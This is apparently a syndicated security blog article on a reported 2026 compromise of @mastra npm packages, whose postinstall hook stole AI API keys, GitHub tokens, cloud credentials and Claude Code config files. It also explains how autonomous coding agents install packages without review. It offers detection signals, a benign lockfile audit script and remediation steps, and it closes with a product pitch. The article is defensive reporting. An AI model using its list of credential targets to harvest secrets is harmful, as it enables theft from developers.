{"slug": "nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages", "title": "Nation-State Actors Are Now Targeting Your AI Agent's npm Packages", "summary": "Microsoft Threat Intelligence reported that North Korean state-sponsored actor Sapphire Sleet compromised over 140 packages in the @mastra npm scope, targeting developers building AI coding tools. The attack used a postinstall hook to steal AI provider API keys, cloud credentials, and CI/CD tokens, marking a strategic pivot by nation-state actors toward AI developer infrastructure.", "body_md": "*This article was originally published on LucidShark Blog.*\n\nOn June 17, 2026, Microsoft Threat Intelligence published a report attributing a supply chain attack on more than 140 packages in the `@mastra`\n\nnpm scope to **Sapphire Sleet**, a North Korean state-sponsored threat actor. Mastra is a TypeScript framework for building agentic AI applications. Its packages are used by teams building Claude Code integrations, MCP servers, and autonomous coding pipelines. The attack vector was a `postinstall`\n\nhook. The payload stole AI provider API keys, cloud credentials, and CI/CD tokens.\n\nThis is not a story about an opportunistic criminal trying to make a quick profit from stolen package manager credentials. This is a nation-state actor making a deliberate, strategic decision that the most valuable target in modern software development is the developer building AI coding tools.\n\n**Scope of the Mastra attack:** 140+ packages across the `@mastra`\n\nand `mastra`\n\nnpm scopes were compromised in a coordinated campaign attributed by Microsoft Threat Intelligence to Sapphire Sleet (also tracked as BlueNoroff). Affected versions contained a `postinstall`\n\npayload designed to exfiltrate AI API keys, GitHub tokens, and cloud service credentials from developer machines.\n\nThe attack followed the same broad pattern as the Miasma Red Hat npm campaign from June 1, but with a critical difference in targeting. Where Miasma went after Red Hat infrastructure teams, Sapphire Sleet went after AI tool builders specifically.\n\nThe attack injected a `postinstall`\n\nscript into compromised package versions. When a developer ran `npm install`\n\n, the hook executed silently before any visible output, scanning the local environment for:\n\nAI provider API keys: Anthropic, OpenAI, Gemini, Mistral\n\nGitHub personal access tokens and fine-grained tokens\n\nAWS, GCP, and Azure credential files\n\nClaude Code configuration files (`~/.claude.json`\n\nand `~/.claude/`\n\n)\n\nMCP server OAuth tokens stored in Claude Code's config\n\nThe exfiltration used an HTTPS beacon to attacker-controlled infrastructure. The full execution completed in under two seconds, before most developers would notice anything amiss in terminal output.\n\n**Timeline:** Malicious versions were published between June 14 and June 17, 2026. Microsoft Threat Intelligence published the attribution report on June 17. Affected packages were revoked from npm within hours of disclosure. Developers who ran `npm install`\n\non any Mastra package between June 14 and June 17 should assume credential compromise and rotate immediately.\n\nThe strategic logic is clear once you map what a developer machine holds compared to any other target in the organization.\n\nA developer building AI coding infrastructure has, in a typical session:\n\nAn Anthropic API key, often with no spend cap, capable of generating thousands of dollars in usage or accessing shared team workspaces\n\nA GitHub PAT with write access to the repositories being worked on\n\nCloud credentials (AWS, GCP, Azure) for the environments the agent deploys to\n\nMCP OAuth tokens granting access to Jira, Confluence, Linear, Slack\n\nLocal access to the codebase itself, often including internal services, private endpoints, and embedded secrets in config files\n\nThis is a higher-value credential bundle than what lives on most corporate workstations. It also lives on a machine where the developer is constantly installing new packages, spinning up new MCP servers, and integrating new tools. The attack surface is not static: it grows every time the developer adds a new dependency to an AI workflow.\n\nSapphire Sleet has previously focused on financial services targets, cryptocurrency exchanges, and defense contractors. The pivot to AI developer tooling is a signal that state actors have mapped the credential landscape and identified AI coding tool developers as a high-yield target category.\n\nTraditional supply chain defenses assume a human in the loop. A developer who is suspicious of a package can review its source before running it. A security team can add a mandatory approval step before new packages are introduced to a project.\n\nAI coding agents break this assumption entirely.\n\nWhen Claude Code decides to install a dependency as part of an agentic workflow, the installation happens automatically. The agent reads the task, determines that `@mastra/core`\n\nis needed, runs `npm install @mastra/core`\n\n, and proceeds. No human reviews the package. No human approves the install. The `postinstall`\n\nhook executes with the developer's full filesystem permissions, including read access to every credential file on the machine, before a human sees any output at all.\n\n```\n# This is what an autonomous Claude Code install looks like\n# The agent selects the package, installs it, and the postinstall fires\n# before any human review can occur\n\n$ claude --task \"set up mastra agentic framework for this project\"\n> Installing @mastra/core@0.11.4...\n> Running postinstall...    ← malicious payload fires here, silently\n> Done in 2.8s\n> Framework initialized. Here is your starter config:\n```\n\nThe developer sees a successful install. The payload has already run. The credentials are already gone.\n\nFour mechanisms that developers typically rely on for supply chain protection all failed against this attack:\n\n**npm audit:** The malicious package had no existing CVE at installation time. `npm audit`\n\nchecks against the npm advisory database, which only populates after a vulnerability is discovered and reported. It is inherently retrospective. Packages are clean until they are not.\n\n**SLSA provenance:** The Mastra attack forged provenance attestations using the same technique as the Miasma campaign: the attackers obtained a legitimate GitHub OIDC token from a compromised CI/CD pipeline and used it to publish packages with valid, verifiable SLSA provenance. The package passed `npm audit signatures`\n\nand appeared to have a legitimate supply chain.\n\n**Dependabot / Renovate:** These tools alert on known-vulnerable versions. They do not inspect package behavior or flag packages with newly added install scripts.\n\n**Code review:** The malicious code was in the `postinstall`\n\nscript of a transitive dependency, not in the application source. Most teams do not review transitive dependency install scripts as part of their PR process.\n\n**The core problem:** Every standard supply chain defense is reactive. It assumes you can wait until a vulnerability is known, documented, and added to a feed. Against a nation-state actor publishing a malicious package and pulling it within hours of discovery, the window between \"clean\" and \"known bad\" is the entire attack window.\n\nThe only class of defense that works against zero-day supply chain attacks is behavioral and reputational analysis run *before* the install script executes. This requires checking properties of the package itself, not its advisory status.\n\nThe signals that would have flagged the Mastra attack before the payload ran:\n\n**New postinstall script in a previously clean package:** The malicious versions added a `postinstall`\n\nfield that did not exist in prior versions. A diff of the package manifest across versions is a high-signal indicator.\n\n**Publish timestamp anomaly:** Multiple versions of related packages published within a short window (hours) is a pattern consistent with a compromised publishing pipeline.\n\n**Script content analysis:** The postinstall script contained base64-encoded content and a network request. Both are strong indicators of malicious intent in an install hook.\n\n**Package reputation score:** A secondary package in the `@mastra`\n\nscope with a low download count and no prior install scripts that suddenly gains a postinstall hook is anomalous.\n\nHere is a quick local audit you can run right now to identify packages with lifecycle scripts in your current project:\n\n``` python\npython3 -c \"\nimport json, sys\n\nwith open('package-lock.json') as f:\n    lock = json.load(f)\n\npackages = lock.get('packages', {})\nrisky = []\n\nfor name, meta in packages.items():\n    scripts = meta.get('scripts', {})\n    hooks = [s for s in ['postinstall', 'install', 'preinstall'] if s in scripts]\n    if hooks:\n        risky.append({\n            'name': name or '(root)',\n            'hooks': hooks,\n            'version': meta.get('version', 'unknown'),\n            'resolved': meta.get('resolved', '')[:60]\n        })\n\nprint(f'Packages with lifecycle scripts: {len(risky)}')\nfor pkg in sorted(risky, key=lambda x: x['name']):\n    print(f'  {pkg[\\\"name\\\"]}@{pkg[\\\"version\\\"]}')\n    print(f'    hooks: {pkg[\\\"hooks\\\"]}')\n    print(f'    source: {pkg[\\\"resolved\\\"]}...')\n    print()\n\"\n```\n\nAny package in this list that you do not explicitly recognize and trust is worth auditing before the next `npm install`\n\nrun.\n\nIf you installed any package in the `@mastra`\n\nscope between June 14 and June 17, 2026:\n\nRotate your Anthropic API key immediately at `console.anthropic.com`\n\nRevoke and regenerate any GitHub personal access tokens\n\nRotate AWS, GCP, or Azure credentials used on the affected machine\n\nRevoke MCP OAuth tokens in each connected service (Jira, GitHub, Confluence, Slack) and reissue with minimal required scopes\n\nCheck `~/.claude.json`\n\nfor stored credentials and rotate everything found there\n\nFor ongoing protection, add postinstall script auditing to your pre-commit or pre-install workflow. Before any `npm install`\n\nrun in an AI-assisted project, check whether any package in the dependency tree has added or modified a lifecycle script compared to the last known-clean lockfile.\n\n**LucidShark includes dependency lifecycle script scanning as part of its local SCA pipeline.** Running `lucidshark analyze`\n\nin your project flags packages with postinstall hooks from unverified or recently modified publishers before they execute, alongside complexity, coverage, and duplication metrics. It runs entirely on your machine, with no data leaving your environment, and integrates with Claude Code via MCP so your agent gets structured feedback before installing flagged packages. Get started at [lucidshark.com](https://lucidshark.com) or install with `npm install -g lucidshark`\n\n.", "url": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages", "canonical_source": "https://dev.to/toniantunovic/nation-state-actors-are-now-targeting-your-ai-agents-npm-packages-3m0g", "published_at": "2026-06-25 16:19:21+00:00", "updated_at": "2026-06-25 16:43:55.120145+00:00", "lang": "en", "topics": ["ai-safety", "ai-infrastructure", "developer-tools"], "entities": ["Microsoft Threat Intelligence", "Sapphire Sleet", "BlueNoroff", "Mastra", "npm", "Anthropic", "OpenAI", "GitHub"], "alternates": {"html": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages", "markdown": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages.md", "text": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages.txt", "jsonld": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages.jsonld"}}